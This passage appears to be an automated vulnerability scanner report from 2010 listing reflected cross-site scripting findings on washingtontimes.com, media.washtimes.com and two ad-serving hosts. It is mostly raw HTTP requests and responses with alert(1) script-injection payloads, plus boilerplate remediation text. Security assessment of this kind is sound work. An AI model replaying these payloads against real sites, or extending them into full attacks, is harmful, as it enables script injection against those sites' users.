GET /content/0/9826/95389/WashingtonTimes-300-250-GE_EcoQuiz_300x250_2-Banner-1358607.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F9826-95389-2653-9%3Fmpt%3D7568887&mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f58455"%3balert(1)//53519a2a4b7 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?58455";alert(1)//53519a2a4b7http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808 ...[SNIP]...
The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a653a'-alert(1)-'b549bf6e82 was submitted in the esi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.17. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://core.insightexpressai.com
Path: /adServer/GetInvite2.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18ad2'-alert(1)-'92f7c0bd65f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 797e9'-alert(1)-'74b0b58b314 was submitted in the referer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.19. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://core.insightexpressai.com
Path: /adServer/adServerESI.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98c2"%3balert(1)//1e992bbbffc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e98c2";alert(1)//1e992bbbffc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;} function IX_InvitePerformed(){if (typeof(window.siteInvited)=='f ...[SNIP]... tePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=171516&referer=www.washingtontimes.com&e98c2";alert(1)//1e992bbbffc=1";document.getElementsByTagName('head')[0].appendChild(s);}})();
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37370<script>alert(1)</script>d467acb9624 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static37370<script>alert(1)</script>d467acb9624/js/global.js HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:26 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static37370<script>alert(1)</script>d467acb9624/js/global.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 126d3<script>alert(1)</script>8e4d52393f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js126d3<script>alert(1)</script>8e4d52393f7/global.js HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:28 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js126d3<script>alert(1)</script>8e4d52393f7/global.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b260<script>alert(1)</script>dc4be321694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js/global.js7b260<script>alert(1)</script>dc4be321694 HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:29 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js/global.js7b260<script>alert(1)</script>dc4be321694') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b4ea<script>alert(1)</script>c8293065a78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static6b4ea<script>alert(1)</script>c8293065a78/js/jquery.cookies.js HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:27 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static6b4ea<script>alert(1)</script>c8293065a78/js/jquery.cookies.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c91d8<script>alert(1)</script>86882e37647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/jsc91d8<script>alert(1)</script>86882e37647/jquery.cookies.js HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:29 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/jsc91d8<script>alert(1)</script>86882e37647/jquery.cookies.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4fd18<script>alert(1)</script>1ea7b8b337a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js/jquery.cookies.js4fd18<script>alert(1)</script>1ea7b8b337a HTTP/1.1
Host: media.washtimes.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Status: 404
Content-Type: text/html
Date: Mon, 13 Dec 2010 21:22:33 GMT
Server: lighttpd/1.4.26
Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js/jquery.cookies.js4fd18<script>alert(1)</script>1ea7b8b337a') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e03"%3b8f7d9a42596 was submitted in the REST URL parameter 1. This input was echoed as f8e03";8f7d9a42596 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutf8e03"%3b8f7d9a42596/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:23:00 GMT
X-Varnish: 570569731
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="aboutf8e03";8f7d9a42596"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4effa'%3b6b9ded45765 was submitted in the REST URL parameter 1. This input was echoed as 4effa';6b9ded45765 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about4effa'%3b6b9ded45765/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14576
Date: Mon, 13 Dec 2010 21:23:02 GMT
X-Varnish: 570569835
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a3b'%3bf9c9b7fd0b8 was submitted in the REST URL parameter 1. This input was echoed as a1a3b';f9c9b7fd0b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsa1a3b'%3bf9c9b7fd0b8/login/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14725
Date: Mon, 13 Dec 2010 21:23:30 GMT
X-Varnish: 570570623
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e701"%3b6f875744f5f was submitted in the REST URL parameter 1. This input was echoed as 8e701";6f875744f5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts8e701"%3b6f875744f5f/login/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14591
Date: Mon, 13 Dec 2010 21:23:27 GMT
X-Varnish: 570570398
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accounts8e701";6f875744f5f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d35'%3bc7939c0c420 was submitted in the REST URL parameter 1. This input was echoed as 10d35';c7939c0c420 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts10d35'%3bc7939c0c420/logout/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14732
Date: Mon, 13 Dec 2010 21:23:06 GMT
X-Varnish: 570569889
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f300a"%3bc2366934839 was submitted in the REST URL parameter 1. This input was echoed as f300a";c2366934839 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsf300a"%3bc2366934839/logout/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14591 Date: Mon, 13 Dec 2010 21:22:59 GMT X-Varnish: 570569719 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accountsf300a";c2366934839"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6116a'%3bade452d872d was submitted in the REST URL parameter 1. This input was echoed as 6116a';ade452d872d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts6116a'%3bade452d872d/password/change/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14550
Date: Mon, 13 Dec 2010 21:24:14 GMT
X-Varnish: 570571830
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df994"%3b08591c70a07 was submitted in the REST URL parameter 1. This input was echoed as df994";08591c70a07 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsdf994"%3b08591c70a07/password/change/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14550
Date: Mon, 13 Dec 2010 21:24:11 GMT
X-Varnish: 570571751
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accountsdf994";08591c70a07"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e4ac"%3bcab35ec224d was submitted in the REST URL parameter 1. This input was echoed as 1e4ac";cab35ec224d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts1e4ac"%3bcab35ec224d/profile/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14755
Date: Mon, 13 Dec 2010 21:23:52 GMT
X-Varnish: 570571221
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accounts1e4ac";cab35ec224d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eecad'%3b301ef79e293 was submitted in the REST URL parameter 1. This input was echoed as eecad';301ef79e293 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountseecad'%3b301ef79e293/profile/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14725
Date: Mon, 13 Dec 2010 21:23:54 GMT
X-Varnish: 570571277
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed177'%3b165bc4c6b25 was submitted in the REST URL parameter 1. This input was echoed as ed177';165bc4c6b25 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bloged177'%3b165bc4c6b25/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14729
Date: Mon, 13 Dec 2010 21:23:12 GMT
X-Varnish: 570570028
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17136"%3b20319022c1a was submitted in the REST URL parameter 1. This input was echoed as 17136";20319022c1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog17136"%3b20319022c1a/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14753
Date: Mon, 13 Dec 2010 21:23:09 GMT
X-Varnish: 570569990
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="blog17136";20319022c1a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c195b'%3bc0dba48e970 was submitted in the REST URL parameter 1. This input was echoed as c195b';c0dba48e970 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogc195b'%3bc0dba48e970/inside-politics/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14729
Date: Mon, 13 Dec 2010 21:26:24 GMT
X-Varnish: 570575142
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a5c6"%3b8a2ba5e08a was submitted in the REST URL parameter 1. This input was echoed as 2a5c6";8a2ba5e08a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
